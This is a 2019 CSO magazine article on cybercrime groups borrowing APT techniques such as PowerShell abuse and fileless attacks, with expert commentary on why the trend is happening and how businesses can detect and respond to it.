Cybercrime groups raise the bar for security teams by borrowing APT techniques

Cyber criminals now have access to more nation-state technology to launch more sophisticated advanced persistent threat attacks. That's bad news for defenders.

For the past several years, an increasing number of cyberecrime groups have adopted techniques and procedures traditionally used by state-sponsored actors. This trend has caught many organizations unprepared, especially small and medium-sized businesses whose defenses are generally focused on regular malware.

The term advanced persistent threat (APT) is typically used to describe targeted attacks where hackers compromise systems with custom or hard-to-detect tools and then perform lateral movement using stealthy techniques that often involve manual hacking. This type of approach has historically been used by groups interested in espionage with the goal of remaining undetected for extended periods of time so they can observe and steal as many secrets as possible.

Meanwhile, cybercrime groups were known to use malware bought from underground markets, to exploit known vulnerabilities, to launch widespread attacks, and to generally focus on getting a quick return on their investment rather than being stealthy. First and foremost, cybercrime groups differentiated themselves from espionage ones by having a financial motive like stealing money directly from victims' accounts, stealing data that could be monetized in some way, forcing victims to pay ransoms and fake fines and so on.

However, the majority of significant cybercrime attacks observed recently used APT techniques, so the technical borders between them are disappearing and these groups are learning from each other, Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab, tells CSO.

Now, some cyberespionage actors regularly use commercial and publicly available malware to complicate attribution efforts and there are cybercrime groups for whom stealthiness and manual hacking have become important components in their operations. The North Korean Lazarus group, for example, is an unusual APT group that used to engage in espionage and sabotage, but which has transitioned to financially motivated attacks. Over the past few years, the group has hit central banks and cryptocurrency exchanges around the world, possibly in an attempt to steal funds for the North Korean government, which has been under global economic sanctions for a long time.

On the other side, cybercrime groups like Carbanak have stolen hundreds of millions of dollars from banks and other financial institutions from around the world by using APT-style attacks. These new, more sophisticated cybercrime groups lurk inside their victims' networks for weeks or months to gain extensive access and learn the organization's workflows before they hit.

Why is the APT landscape changing?

"I think there are two broader trends that are at play," says Tim Maurer, author of Cyber Mercenaries: The State, Hackers, and Power and co-director of the Cyber Policy Initiative at the Carnegie Endowment for International Peace, a foreign-policy think tank. "The first one is that in some countries the relationship between the state and the criminal underground is actually one where criminals will be allowed certain types of the activities as long as it's to the benefit of the state."

There have long been rumors in the security community that intelligence agencies in countries like Russia or China are contracting cybercriminals for intelligence operations, either directly or through intermediaries. An example of this came to light in 2017, when the U.S. Department of Justice indicted two officers of the Russian Federal Security Service (FSB) for hiring a known criminal hacker to break into Yahoo's network.

The recruitment of cybercriminals into intelligence operations can obviously lead to an exchange of more sophisticated techniques, tactics and procedures (TTPs) that can then be used in criminal activities as well. However, Maurer believes that this convergence of techniques between the two types of actors is more illustrative of a second trend that he finds more worrisome, and that is the general proliferation of cyber capabilities and actors.

"I think there is this constant dynamic of learning from the best," Maurer tells CSO. "Sometimes criminals might be better than states in what they developed and sometimes states will be better, and the two actors will learn from each other. And that's because so much of this information becomes available publicly and globally."

According to Maurer, considerably more countries now have offensive cyber capabilities than 10 years ago and to get those capabilities, some states have borrowed malware tools from cybercriminals, either because they were good or because they wanted to disguise their own activities. Similarly, when the Shadow Brokers group leaked the EternalBlue exploit, which is believed to have been part of the NSA's toolset, both state-sponsored and criminal groups integrated it into their operations.

As more states are developing these tools and are either using them or losing them, like it happened with EternalBlue, the tools will become available to criminals who will then copy them, Maurer says. "Then criminals will become more advanced and some of the states that might just be entering the game will start using the more sophisticated criminal tools. It's a spiral and only the best resourced companies can keep up with this threat evolution over time."

What APT techniques are cybercriminals adopting?

Many cybercrime attacks today make use PowerShell and other utilities found on Windows systems by default. In the security industry this tactic is known as "living off the land" and makes detection harder because unlike traditional malware programs, these tools are not inherently malicious. PowerShell is widely used to automate system administration tasks and even though Microsoft has added options to restrict its use, IT teams can't afford to disable it entirely because it would make their job much harder.

PowerShell abuse is also associated with another tactic that has become common in recent years: fileless attacks. These are attacks where hackers inject malicious code into the memory of legitimate processes that run on a system by using a variety of techniques like remote thread injection, APC, atom bombing, process hollowing, local shellcode injection or reflective loading. The goal is to avoid creating binary files on disk that could be detected by antivirus programs.

Aside from executing as the initial payload, PowerShell is also often used to achieve persistence by adding rogue scripts to the system registry or to scheduled tasks to reinfect the system after reboot. That's because the code injected into the memory of other processes is cleared when the system is shut down.

One of the cybercrime groups that almost exclusively uses fileless techniques is FIN7, which is possibly a division of the larger Carbanak group. While Carbanak is known for attacks against banks and other financial organizations, FIN7 targets primarily retailers and companies from the restaurant and hospitality industries. Its goal is to compromise point-of-sale systems and steal payment card data. The U.S. Department of Justice indicted three suspected high-ranking members of FIN7 in August and said that the group has compromised more than 6,500 point-of-sale terminals at over 3,600 business locations across the U.S., stealing more than 15 million payment card records.

Both cybercriminals and state-sponsored groups also abuse free and open-source tools that were designed for legitimate purposes like penetration testing. These tools include the Metasploit framework, the PowerSploit framework, Empire PowerShell, the Cobalt Strike framework and many other freely available utilities for credential dumping, file wiping and other operations.

One of the biggest problems that security companies and malware researchers face is that an increasing number of groups are abusing PowerShell and many of the scripts they use are copied from GitHub and other public sources, so it's becoming very hard to attribute attacks to specific groups, Raiu says.

Registration data for command-and-control servers, technical similarities to previous attacks, the occasional use of custom tools like keyloggers, screenshot grabbers and exploits, can also be used to link attacks to certain groups, Raiu says, but in general, it's becoming harder and harder to do attribution, he concluded.

How do APT attacks from cybercrime groups impact companies?

When developing IT security strategies and deciding how to spend their limited security budgets, businesses and other organizations work with threat models. This means they determine what type of threats and actors pose the biggest risks to their industry and systems and prioritize resources to counter them. As a result, many companies that are not typical targets for cyberespionage might not have implemented strong defenses for APTs and now have a blindspot when it comes to this new wave of hybrid cybercrime attacks.

To detect APT-style attacks, companies need more than endpoint antivirus programs and firewalls. They need security information and event management (SIEM) and advanced endpoint detection and response (EDR) solutions. These products monitor system and network activity and logs for potentially suspicious behavior and generate alerts, which security teams need to look at.

This means they require more specially trained staff to manage, which can be a serious problem for small and medium-sized businesses due to budget constraints and the cybersecurity skills shortage in general. Even large organizations that can afford to deploy such solutions often have trouble dealing with the large amount of alerts they generate. This can lead to backlogs and alert fatigue where security staffers dismiss potentially important alerts too easily due to their sheer number and frequency.

Unfortunately, it's common for companies to buy feeds with millions of threat indicators that generate thousands of alerts per day instead of subscribing to smaller feeds that only catch real things, Raiu says. So, it's also about the quality of the feeds used for these tools, as well as the resources available to investigate the alerts. Of course, outsourcing all these tasks to a managed security service provider is always an option and many security companies offer such services to SMBs.

According to Raiu, businesses should consider the fact that they might not be able to prevent a sophisticated persistent attacker from breaking in, so they should focus on solutions that could decrease the time it takes to detect such compromises and respond to them. This means having monitoring solutions in place that can detect anomalies in network and Internet traffic or in endpoint behavior. "I think it is possible to do this even for smaller companies that don't have large budgets," Raiu says.

Tim Maurer believes that for small- and medium-sized companies, the migration to cloud might also potentially be a good solution to protect themselves against these types of sophisticated attacks, because it allows them to benefit from the expertise of the cloud providers' large security teams and better technology.

Copyright © 2019 IDG Communications, Inc.

Get the best of CSO ... delivered. Sign up for our FREE email newsletters!